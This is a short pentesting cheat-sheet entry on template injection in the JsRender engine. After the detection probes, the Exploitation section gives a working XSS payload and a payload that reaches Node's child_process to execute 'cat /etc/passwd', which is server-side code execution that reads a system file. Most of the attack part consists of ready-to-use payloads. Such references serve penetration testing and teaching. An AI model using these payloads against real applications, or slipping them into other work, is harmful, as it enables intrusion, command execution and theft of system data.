JsRender Template Injection

JsRender is a light-weight but powerful template engine. It is vulnerable to template injection.

- [template-injection-jsrender-jsviews](https://appcheck-ng.com/template-injection-jsrender-jsviews)

Investigation

Try to insert arbitrary code into double curly brackets. If the result of the code is reflected in the page, we can inject malicious code in the template.

{{:2*3}}
{{:"test".toString}}

Exploitation

# XSS
{{:"test".toString.constructor.call({},"alert(1)")}}
# Read local files
{{:"test".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}